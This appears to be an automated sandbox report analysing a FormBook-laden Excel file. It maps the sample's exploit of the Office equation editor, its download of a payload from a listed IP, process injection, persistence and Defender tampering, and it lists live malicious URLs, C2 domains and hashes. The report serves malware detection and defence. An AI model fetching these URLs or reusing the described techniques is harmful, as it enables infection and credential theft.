          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Scheduled Task/Job 1 | Access Token Manipulation 1 | Disable or Modify Tools 21 | Credential API Hooking 1 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 611 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Scheduled Task/Job 1 | Obfuscated Files or Information 41 | Security Account Manager | Security Software Discovery 221 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | Command and Scripting Interpreter 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 3 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | Scheduled Task/Job 1 | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Virtualization/Sandbox Evasion 31 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 111 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 31 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 611 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 404009, Sample: Refno.191938.xlsx, Startdate: 04/05/2021, Architecture: WINDOWS, Score: 100
          Top-level DNS/IP: www.streamxvid.com. Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures.
          Process tree recovered from the graph:
          EXCEL.EXE (started): dropped C:\Users\user\Desktop\~$Refno.191938.xlsx (data)
          EQNEDT32.EXE (started): contacted 198.23.213.57, 49165, 80 (AS-COLOCROSSINGUS, United States); dropped C:\Users\user\AppData\Local\...\ohms[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            vbc.exe (started by EQNEDT32.EXE): dropped C:\Users\user\AppData\...\zFVxYeAVOjnwuB.exe (PE32) and C:\Users\user\AppData\Local\...\tmp4D08.tmp (XML); signatures: Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; 2 other signatures
              powershell.exe (started); powershell.exe (started); 2 other processes
              vbc.exe (started): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected): contacted 20svip.com 43.226.23.112, 49166, 80 (SUNHK-DATA-AS-AP Sun Network Hong Kong Limited, Hong Kong), www.pistonpounder.com, www.20svip.com; signature: System process connects to network (likely due to code injection or exploit)
                  cmmon32.exe (started): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Refno.191938.xlsx | 31% | Virustotal |
          Refno.191938.xlsx | 23% | ReversingLabs | Document-Office.Exploit.Heuristic

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          13.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.20svip.com/op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          www.kelurahanpatikidul.xyz/op9s/ | 0% | Avira URL Cloud | safe
          http://198.23.213.57/ohms.exe | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.streamxvid.com | 178.33.233.22 | true | false | | unknown
          20svip.com | 43.226.23.112 | true | true | | unknown
          www.pistonpounder.com | unknown | unknown | true | | unknown
          www.20svip.com | unknown | unknown | true | | unknown

                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.20svip.com/op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== | true | Avira URL Cloud: safe | unknown
          www.kelurahanpatikidul.xyz/op9s/ | true | Avira URL Cloud: safe | low
          http://198.23.213.57/ohms.exe | true | Avira URL Cloud: malware | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | powershell.exe, 00000007.00000002.2155583236.0000000002BC0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp; powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp; powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmp | false | | high
http://vbcity.com/forums/t/51894.aspx | vbc.exe | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp; powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp; powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp; powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp; powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.2153930847.0000000002521000.00000004.00000001.sdmp | false | | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp | false | | high
https://github.com/MrCylops | vbc.exe | false | | high

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.23.213.57 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
43.226.23.112 | 20svip.com | Hong Kong | 38197 | SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | true

                                            General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404009
Start date: 04.05.2021
Start time: 16:29:47
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Refno.191938.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@17/10@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 18.7% (good quality ratio 17.9%)
• Quality average: 72.4%
• Quality standard deviation: 28.1%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
16:40:59 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
16:41:01 | API Interceptor | 94x Sleep call for process: vbc.exe modified
16:41:05 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
16:41:05 | API Interceptor | 46x Sleep call for process: powershell.exe modified
16:41:27 | API Interceptor | 229x Sleep call for process: cmmon32.exe modified
16:42:04 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

Match | Associated Sample Name / URL | Detection | Context
198.23.213.57 | RES Shipping documents SLO-0167.xlsx | malicious | 198.23.213.57/ohms.exe
198.23.213.57 | Quote - P75D53 - FATP- RF.xlsx | malicious | 198.23.213.57/ohms.exe
198.23.213.57 | Products List.xlsx | malicious | 198.23.213.57/fk.exe
198.23.213.57 | Biomed quotation.xlsx | malicious | 198.23.213.57/ohms.exe
198.23.213.57 | NEW ORDER PO.xlsx | malicious | 198.23.213.57/bob.exe
198.23.213.57 | Product list.xlsx | malicious | 198.23.213.57/lol.exe
198.23.213.57 | Product list.xlsx | malicious | 198.23.213.57/local.exe
198.23.213.57 | Balance Payment.xlsx | malicious | 198.23.213.57/razi.exe
198.23.213.57 | signed and stamped proforma invoice.xlsx | malicious | 198.23.213.57/god.exe
198.23.213.57 | New_Item.xlsx | malicious | 198.23.213.57/jesus.exe
198.23.213.57 | Order 2550619.xlsx | malicious | 198.23.213.57/rrr.exe
198.23.213.57 | New Inquries.xlsx | malicious | 198.23.213.57/GOD.exe
198.23.213.57 | New Inquries.xlsx | malicious | 198.23.213.57/GOD.exe
198.23.213.57 | payment Swift copy987656789PI.xlsx | malicious | 198.23.213.57/CFILEE.exe
198.23.213.57 | MT218 20 328.xlsx | malicious | 198.23.213.57/KASPA.exe
198.23.213.57 | productSpec_2141176 PHES.xlsx | malicious | 198.23.213.57/Ohms.exe
198.23.213.57 | Order List.xlsx | malicious | 198.23.213.57/fank.exe
198.23.213.57 | PO-4806125050.xlsx | malicious | 198.23.213.57/UGO.exe
198.23.213.57 | Order Comfirmation.xlsx | malicious | 198.23.213.57/zina.exe
43.226.23.112 | 20-QAI-PRJ-0051-Appendix A-D.DOCx.exe | malicious | www.20svip.com/rc5/

                                            Domains

Match | Associated Sample Name / URL | Detection | Context

                                            ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | tetup.exe | malicious | 23.94.41.215
AS-COLOCROSSINGUS | sample04052021.xlsx | malicious | 192.3.122.199
AS-COLOCROSSINGUS | Pending DHL Shipment Notification REF 04521.xlsx | malicious | 198.23.207.82
AS-COLOCROSSINGUS | 29f6b8ff_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 33075048_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | bf10a8ed_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | b6379798_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | ef2ccb56_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 57e4e9e9_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 49aa838c_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | b3976dff_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | cdce1cb3_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | faf01c9e_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 2044d4ec_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | df024c6e_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 87be565b_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | a856bf89_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 0a71c578_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 523eab29_by_Libranalysis.dll | malicious | 107.172.227.10
AS-COLOCROSSINGUS | 99140c91_by_Libranalysis.dll | malicious | 107.172.227.10
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 2021_02_25.exe | malicious | 117.18.12.137
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | Tx1q8DSCKe.exe | malicious | 43.243.108.245
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 210127.exe | malicious | 117.18.12.137
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | SecuriteInfo.com.Trojan.PackedNET.507.15470.exe | malicious | 43.243.108.245
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | sample2.doc | malicious | 210.56.52.6
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | ucPCgX1NlH.exe | malicious | 43.243.108.245
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | form.doc | malicious | 210.56.52.6
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | http://goodjobssolutions.com/mayo-clinic-nmk5w/WQDXUGGDH1memfhbzQba7kowTEW24A/ | malicious | 210.56.52.6
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/ | malicious | 210.56.52.6
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | https://j.mp/3nGS85B | malicious | 202.146.220.226
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 20-QAI-PRJ-0051-Appendix A-D.DOCx.exe | malicious | 43.226.23.112
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | cotizacio.exe | malicious | 43.226.16.144
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | http://gbghe.com/ | malicious | 103.230.242.112
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | https://amazon.co.jp.yuake.cn/mobile | malicious | 210.56.57.103
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | Crack_BitRecover_PST_Password_R.exe | malicious | 223.26.62.72
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 17Order 945498.exe | malicious | 202.146.219.27
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 11Replace Doc.exe | malicious | 202.146.219.27
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 39Payment slip.exe | malicious | 202.146.219.27
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 82spoilt product.exe | malicious | 202.146.219.27
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong | 14updated items doc.exe | malicious | 202.146.219.27

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 734720
Entropy (8bit): 7.525234190780704
Encrypted: false
SSDEEP: 12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
MD5: BA01DF16E4C876E078348FD4479A8FDF
SHA1: 6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
SHA-256: 8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
SHA-512: 7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://198.23.213.57/ohms.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8078B401.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 5376
Entropy (8bit): 5.042628525470356
Encrypted: false
SSDEEP: 48:p2NoUunCa4ukzw+Lv6KbLSNRyBLf2qoCfVYIrxQ2PNrYJf66QpTIZTAo0zQnvBv6:c+Z0LbLSNR8L5oCNYdWN8M6QNcvBvPy
MD5: 6FE828081F388FA5A947F56C02700117
SHA1: 908CEAC45F0632017D658D0605AC48E683FC0FD5
SHA-256: 66B184623BA8775B4F92C1D50467BFDE8CA7DB9F5FA165446CE340FF06E9CB3F
SHA-512: F1A5DDF7BE560A1D282B1FE2017CB6B914F5528E96B6348E813EB89F61F3CEB38373A1B260991C8B25BF0086F2E3C893DEB73B6106ECC645BB0E07898A293EEA
Malicious: false
Reputation: low
                                            Preview: ....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I...................................................gu0..O.f.f.i.c.e.1.2.\.E.X.C.E.L.....t...gY.s........D.{j..........gu.{.u.e.u....T.......8{.u.T.w..u............./.w.3hw..{j..*...*.......v........H........u= .#..*......v........./.w..hw..{jx................Y.s................0.......ghu........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAC28400.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 653280
Entropy (8bit): 2.8986289150517437
Encrypted: false
SSDEEP: 3072:B34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:p4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5: 43FE6C64B83EFAA9ED41B214135212DD
SHA1: 0DDBD7959A6821E49C0C916E087D1C689471E63B
SHA-256: BA3556F0C1785899BFE45DC715CC7183EADA85AD2DA8708CE29446D759D74BFE
SHA-512: DA54DC7B4C3549AAA3873B11E9F142ACC2FE252BB8B6D34BD7B25C59403BC54321388CCF451EEB305BB0ECC2BF83AA813B106F0D30454F459C7F55497AEC2585
Malicious: false
                                            Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................x........N._x...p...........\....N._x...p... ....y.Zp...x... ............z.Z............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...p........2.Z.................{.Z............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                            C:\Users\user\AppData\Local\Temp\tmp4D08.tmp
Process: C:\Users\Public\vbc.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1626
Entropy (8bit): 5.166128249755591
Encrypted: false
SSDEEP: 24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3h
MD5: 35702C07F2155E8313D34F86C9BC4C01
SHA1: BB10B2592BBB24D77D4B4E11A1F84C343D9B9CDC
SHA-256: 4E1409B1E80CFE5A5BDA6BC58175D8E580D4E289F06DDD441135F3F06D97A6D4
SHA-512: C8A3C1F6C95DE2FFEB8F26458213DEE88382CBD2065DE9625D6B84CFF9ED64D22E94F4E5AE8129625737E76052248B9B99FB522474F702256E6EA80C94FB1446
Malicious: true
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C7KNZSSZ1DI8GVV6CBOE.temp
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.579570991262064
Encrypted: false
SSDEEP: 96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
MD5: FF71E5285457125B1C244AF15F69FE52
SHA1: 05462AF421A836630E0FE28FF18C114D1E853D1E
SHA-256: DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
SHA-512: 52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
Malicious: false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., 